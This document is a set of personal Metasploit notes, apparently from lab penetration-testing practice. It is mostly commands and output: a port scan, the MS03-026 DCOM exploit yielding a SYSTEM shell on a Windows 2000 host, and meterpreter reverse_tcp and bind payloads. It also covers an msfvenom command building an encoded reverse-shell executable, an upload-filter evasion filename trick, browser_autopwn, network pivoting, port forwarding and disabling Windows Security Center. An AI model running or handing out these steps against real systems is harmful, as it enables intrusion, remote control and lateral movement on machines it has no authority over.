Metasploit Notes

Use command line

msfupdate

msfconsole

Scan ( I like nmap better )

msf > use auxiliary/scanner/portscan/tcp

msf auxiliary(tcp) > show options

msf auxiliary(tcp) > set PORTS 1-200

PORTS => 1-200

msf auxiliary(tcp) > set RHOSTS 192.168.8.1-20

RHOSTS => 192.168.8.1-20

msf auxiliary(tcp) > run

[*] 192.168.8.15:9 - TCP OPEN

[*] 192.168.8.15:7 - TCP OPEN

[*] 192.168.8.15:17 - TCP OPEN

[*] 192.168.8.15:13 - TCP OPEN

[*] 192.168.8.15:19 - TCP OPEN

[*] 192.168.8.15:25 - TCP OPEN

[*] 192.168.8.15:21 - TCP OPEN

[*] 192.168.8.15:42 - TCP OPEN

[*] 192.168.8.15:53 - TCP OPEN

[*] 192.168.8.15:80 - TCP OPEN

[*] 192.168.8.15:139 - TCP OPEN

[*] 192.168.8.15:135 - TCP OPEN

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf auxiliary(tcp) > back

Search

msf > search dcom

Matching Modules

================

Name Disclosure Date Rank Description

---- --------------- ---- -----------

exploit/windows/dcerpc/ms03_026_dcom 2003-07-16 great Microsoft RPC DCOM Interface Overflow

exploit/windows/driver/broadcom_wifi_ssid 2006-11-11 low Broadcom Wireless Driver Probe Response SSID Overflow

exploit/windows/smb/ms04_031_netdde 2004-10-12 good Microsoft NetDDE Service Overflow

EXPLOIT

msf > use exploit/windows/dcerpc/ms03_026_dcom

msf exploit(ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

Name Current Setting Required Description

---- --------------- -------- -----------

RHOST 192.168.8.15 yes The target address

RPORT 135 yes The target port

can change payload

set PAYLOAD windows/meterpreter/reverse_tcp

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC thread yes Exit technique: seh, thread, process, none

LHOST 192.168.7.20 yes The listen address

LPORT 4444 yes The listen port

set PAYLOAD windows/shell/bind_tcp

msf exploit(ms03_026_dcom) > exploit

[*] Started bind handler

[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...

[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.8.15[135] ...

[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.8.15[135] ...

[*] Sending exploit ...

[*] Sending stage (240 bytes) to 192.168.8.15

[*] Command shell session 4 opened (192.168.7.20:33994 -> 192.168.8.15:4444) at 2012-01-14 09:24:46 -0500

Microsoft Windows 2000 [Version 5.00.2195]

(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>

Metepreter

meterpreter > sysinfo

Computer : FOOL

OS : Windows 2000 (Build 2195).

Architecture : x86

System Language : en_US

Meterpreter : x86/win32

meterpreter >

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > getpid

Current pid: 432

Browser based attacks

msf > use auxiliary/server/browser_autopwn

set options

Msfconsole

use exploit/multi/handler

set Payload windows/meterpreter/reverse_tcp

set LHOST and LPORT

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.73.128

LPORT=4444 -e x86/shikata_ga_nai -i 25 -x /root/Desktop/atack.exe -f exe >

/root/Desktop/atack.exe

cat bad.jpg bad.asp > 'bad.asp:.jpg'

sessions -l

sessions - i 1

Pivot

gain acess to first box.

if it has multiple interfaces

ipconfig

use arp

run arp_scanner -r subnet (192.168.0.1/24)

add route

route add Dest-add 255.255.255.0 session ID

route print

Port scanner

use auxiliary/scanner/portscan/tcp (can not do syn scan)

set RHOSTS

set PORTS 1-200

run

Bind is best payload for this attack

Port Forward

locallistener is on attackers box

portfowd add -l 25000 -p 80 -r (IP of Target)

Now using localhost:25000 I can conect to Target

WSCSVC

c:\windows\system32\svchost.exe -k netsvcs

run switchwsc